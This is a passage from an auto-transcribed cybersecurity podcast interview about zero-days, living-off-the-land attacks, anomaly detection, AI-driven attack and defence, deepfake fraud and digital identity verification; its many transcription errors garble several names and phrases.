systems that can be exploited at a later point in time as a zero
00:37:24
day.
00:37:24
They hold onto those dearly.
00:37:26
They don't want to let those go in the wild unless they
00:37:30
absolutely have to.
00:37:31
They'd only be employed against a highest-value department.
00:37:34
Once they're used, eventually it'll be discovered, then you
00:37:39
can build a rule of signature going forward.
00:37:43
That is where the detection analytics becomes much more
00:37:49
sophisticated and complex and really is where things like
00:37:56
anomaly detection come into play .
00:37:58
When we think about how we look for signs of a threat actor in
00:38:04
an environment.
00:38:05
There's the things that we know to go look for because we
00:38:06
threat actor in an environment.
00:38:06
There's the things that we know to go look for because we
00:38:09
observed them in the past.
00:38:10
These things are all now chronical and great repositories
00:38:15
like Envire Attack Framework, which is a fantastic resource,
00:38:21
but there are these more novel attacks.
00:38:24
There's also now Living Out the Land, which is also the
00:38:27
merchant technique of a nation-state or advanced threat
00:38:31
actor.
00:38:31
They're not going to use tooling or techniques that would
00:38:36
be detected by Kraus-Fried or other detection technology.
00:38:39
They're using PowerShell, which might already exist on the
00:38:41
system, and using that under credentials that they've
00:38:46
compromised through other means, and so you know those things
00:38:49
become harder to detect because they're using tools in the
00:38:52
environment, using accounts that they've got access to and
00:38:56
they're blending in.
00:38:58
And that is where anomaly detection then plays a role,
00:39:02
where really the only way you can suss that out is by
00:39:05
identifying shifts in behavior, shifts in behavior for an
00:39:09
account or a collection of accounts tied to a user, or
00:39:13
shifts in behavior of a process on a system or a system in
00:39:19
general and how it interacts with other systems.
00:39:24
And that is hard to do well without having a false alarm
00:39:28
factory, but that is where you get on the very vamp side for
00:39:33
detection.
00:39:34
Anomaly detection needs to play a critical role and the
00:39:39
challenge with anomaly detection is that you need a lot of
00:39:42
people traditionally to do that well, because you're going to
00:39:45
fire off a lot of alarms that somebody needs to go investigate
00:39:48
because the false positive anomalies currently and
00:39:53
historically have been very high .
00:39:54
It's hard to differentiate between an anomaly of an account
00:39:59
, which is a user just shifting their normal behavior to an
00:40:02
account that is actually under the control of a threat actor.
00:40:06
Those two things are hard to differentiate in data analytics
00:40:12
and that is for us a big area of innovation as far as going
00:40:17
forward is the anomaly section layer as we continue our roadmap
00:40:21
on the path towards nation-state threat resiliency.
00:40:29
Speaker 1: Yeah, that is.
00:40:29
It's a really it's a really challenging area, right.
00:40:33
We're kind of moving into this place where we're getting so
00:40:36
advanced, you know, the defenses are becoming so advanced that
00:40:40
the attackers are coming out with, um, you know, like things
00:40:47
that you would just never think of as attack factors and as
00:40:51
methods of compromise, right, and it's always interesting for
00:40:55
me to kind of see where this is going.
00:40:57
You know, and you know for you as an expert in the field, where
00:41:01
do you see this evolving to right?
00:41:04
Where do you see this evolving to right?
00:41:08
Where do you see potentially, the threat actors evolving to to
00:41:10
counteract a anomaly detection system?
00:41:12
And then what are the protections that could even come
00:41:17
into play in the future of, you know, addressing those risks?
00:41:22
Speaker 2: yeah, I'm gonna hit.
00:41:23
Sorry, it's hard to know for sure where it's going to go, but
00:41:25
yeah, ai is certainly going to, you know, increase an important
00:41:28
role in it.
00:41:29
From you know just the ability to better synthesize engineering
00:41:35
type attacks, whether that's through, you know, through email
00:41:39
or text or voice, or right, I mean you can bring me a phone
00:41:42
call so that sound like your mom or their dad, um, asking them
00:41:46
for information, for help, because that can voices cannot
00:41:49
be stolen that image or a video, something that they love, you
00:41:52
know, and yeah, and in in harm's way and suss that out as fraud
00:41:56
or fraud, or so you know we're going to see, you know, that
00:41:59
class of attack on the social and human, you know side of
00:42:03
things.
00:42:03
Uh, and then you know things, and then AI is also going to be
00:42:08
used to accelerate the pace of finding weaknesses in software
00:42:11
vulnerabilities and also to exploit them from an automation
00:42:14
perspective, and so there's just going to be an accelerant and
00:42:18
an enablement factor across all attack vectors, and the same
00:42:23
then needs to be seen on the defensive side as well.
00:42:27
I think the challenge is that the offensive side faces the
00:42:32
defensive side, and so there'll be some catching up to do on the
00:42:38
defensive side.
00:42:39
That's why I've personally always been a huge believer in
00:42:43
really just threat detection and incident response, because I
00:42:47
just think you know you can never.
00:42:49
The threat actor will always have motivation.
00:42:52
They will typically be ahead of the defensive mechanisms that
00:42:56
can be put in place from a prevention perspective and you
00:42:59
just have to be able to detect, you know, these indicators of
00:43:03
compromise responsible because you know, because a motivated
00:43:07
threat will get through.
00:43:09
And so for us on the defensive side, I think it's really going
00:43:13
to be looking at how can the advancements in AI and machine
00:43:17
learning help us better synthesize the data that we now
00:43:21
have access to there's so much information now that we can
00:43:25
require about IT infrastructures and environments how we better
00:43:30
synthesize that to understand when we see meaningful shifts in
00:43:33
that environment and to pull them out with increasing
00:43:36
accuracy.
00:43:37
Ai should play a profound role in the evolution of anomaly
00:43:40
detection and the accuracy of anomaly detection.
00:43:42
Anomaly detection and the accuracy of anomaly detection.
00:43:44
It also should play a profound role in helping to guide and
00:43:49
augment human security operators , be that security co-pilot type
00:43:54
ability that helps them to make better, more informed decisions
00:43:59
or even predict and suggest the course of action to take in a
00:44:03
given scenario or condition and eventually do it for them.
00:44:08
That's the ultimate place we need to get to is that AI is
00:44:14
actually making the end-to-end determination of that's a novel
00:44:18
attack.
00:44:19
That system's compromised, that account's compromised along
00:44:23
with the 10 others, and the AI is empowered and able to disable
00:44:25
those accounts, that system, without compromised, along with
00:44:26
the 10 others, and the AI is empowered and able to disable
00:44:27
those accounts and build a GNS system without any human being
00:44:30
involved.
00:44:31
You know that is the pace we need to get to from a defensive
00:44:34
perspective.
00:44:35
That's going to take years of innovation to get there, because
00:44:38
it needs to be completely trustworthy.
00:44:41
You can't have an autonomous agent, an entity in your
00:44:46
environment that is beginning to change the IT infrastructure on
00:44:51
the fly based on what it's observing, if you do not
00:44:54
absolutely trust it, because ultimately, business rules out
00:44:58
of a risk.
00:44:58
You have to run your business, and so you know, mississippi
00:45:05
Gold H, ours.
00:45:05
We see ourselves as an AI platform.
00:45:06
Ultimately, how do we evolve the platform to the point where
00:45:12
that AI becomes more independently you know sent is
00:45:18
not the right word but you know, more independently, empowered
00:45:23
to take actions without a human operator being in the loop, with
00:45:27
increased frequency?
00:45:31
Speaker 1: It seems like it's going the AI route on both ends,
00:45:34
where attackers are going to be using AI to mimic someone's
00:45:38
voice that you trust and know, to mimic you to gain access to
00:45:42
your accounts and things like that.
00:45:44
On the other hand, we have to evolve as well and develop ai to
00:45:51
, you know, identify those other rogue ais.
00:45:55
Right, it's a interesting, you know it's a.
00:46:00
It's an interesting time because we're like right at the
00:46:02
very beginning where we're starting to see like computers
00:46:05
versus computers in a very real, tangible way yeah, it's, yeah,
00:46:11
it's a real problem.
00:46:14
Speaker 2: I think you know I look I'm not.
00:46:17
You know, politics aside, you know, you know, I think there's
00:46:19
a, there's a, there's a, there's a very strong argument now for
00:46:22
some kind of a national digital ID system and, almost like NASA
00:46:27
public key infrastructure where people's you know, you know
00:46:30
digital identity can be verified .
00:46:33
You know, and we need to get ahead of this in some way so
00:46:37
that when I send something or my image is included, you know, is
00:46:41
this part of a picture, part of a video where my voice is
00:46:43
recorded, is part of a picture, part of a video where my voice
00:46:45
is recorded, that can be cryptographically signed in some
00:46:48
way and be verified as actually being me and to me.
00:46:55
Like you know, I'm not being on my cryptographic knowledge, but
00:46:59
you know, pci-extra, which was when I was back in cryptography,
00:47:03
could have a role to play here.
00:47:06
But one way or another, I think if we can't get on top of being
00:47:11
able to actually verify that the current center entity in an
00:47:17
image or on voice or in communication is actually who
00:47:21
they are, it's going to be a bit of a wild and scary ride.
00:47:25
And the security side, it's going to be a bit of a wild and
00:47:28
scary ride.
00:47:28
And the security side it's going to be hard to address.
00:47:34
Speaker 1: Yeah, that's an interesting problem.
00:47:37
Slash solution, right.
00:47:39
I've thought about that digital identity verification before
00:47:45
and just as a security professional, right it.
00:47:48
It makes me nervous yeah because then I started thinking of okay
00:47:52
, well, how can that be used against me?
00:47:54
How can it be potentially stolen and, you know,
00:47:58
impersonate me?
00:47:58
Right, because that will.
00:47:59
That will shift the focus of you know nation states, which
00:48:04
unlimited resources, and if they just say, hey, we're going to
00:48:07
break into this database, no matter what, you know, we're
00:48:10
going to find it, we're going to get all the information from it
00:48:12
, it's really it's almost more of a you know matter of time
00:48:17
until they do it, rather than they'll never do it.
00:48:20
Right, but at the same time, we need something like that to
00:48:25
kind of get ahead to provide the privacy and the identity
00:48:30
verification of people on social media, of people over email and
00:48:35
things like that.
00:48:36
So it's an interesting problem.
00:48:38
I almost feel like there's no right answer right now, at least
00:48:43
I don't know, maybe for myself, right, maybe I'm too, maybe I'm
00:48:46
too too on the negative side, I guess it's a tough one.
00:48:50
Speaker 2: My views have changed .
00:48:51
I mean, it's 20 years ago.
00:48:52
No way I want that, because I haven't gotten that kind of
00:48:56
insider information.
00:48:57
But I think for me is, um, I, yeah, I, I would fashion myself
00:49:01
a pragmatist and you know, in most things, and the reality is
00:49:04
now there is no more privacy, um , yeah, and, and so we've
00:49:09
already lost privacy.
00:49:10
Privacy's gone right.
00:49:12
I mean, it's just that, you know.
00:49:14
You know, it's just, our information is in the hands of
00:49:19
various companies google, apple, microsoft's, um, they know a
00:49:25
ton about us.
00:49:25
And then there's the dark web and what's out there about us,
00:49:30
and so that you know the notion of privacy I don't think it's
00:49:35
real anymore anyway, and we also have the protections and
00:49:38
benefits that would come along with something like a, some kind
00:49:42
of digital ID or at least ID verification system, and there
00:49:46
are ways to do this cryptographically, which is
00:49:49
still your oscocate person, you know and have some privacy
00:49:52
method, the mechanism, built into it.
00:49:54
That's not my area of specialty , but I believe there is a,
00:49:57
there is a solution, you know, to at least address the deep
00:50:02
fake fraud that is coming and the voice fraud that is coming
00:50:08
and all the things that are coming where people's images and
00:50:12
voices and likenesses can be used for malicious purposes.
00:50:16
It is a very, very challenging problem, technologically and
00:50:22
socially.
00:50:22
It's probably one we're not going to see a solution to
00:50:28
anytime soon.
00:50:30
Speaker 1: Yeah, definitely Chris.
00:50:32
Unfortunately we're at the top of our time here.
00:50:35
The 50 minutes or so really flew by.
00:50:39
It was a very interesting conversation.
00:50:41
I really appreciate you coming on.
00:50:43
I really enjoyed it.
00:50:45
Speaker 2: Yeah, I think it's nice to recover a lot of fun
00:50:49
areas, so thanks for having me on as a guest.
00:50:53
Speaker 1: Yeah, absolutely so, Chris.
00:50:54
Before I let you go, how about you tell my audience where they
00:50:57
can find you if they wanted to reach out, and where they can
00:51:00
find your company?
00:51:01
Speaker 2: Yeah, I mean, I think really the best way is to go to
00:51:04
our website, radicalcom.
00:51:06
That's radical without the W-A-R-I-D-I-C-L awesome.
00:51:15
Speaker 1: Well, thanks, chris.
00:51:16
I really appreciate it and I hope everyone listening enjoyed
00:51:19
this episode.
00:51:20
Bye everyone.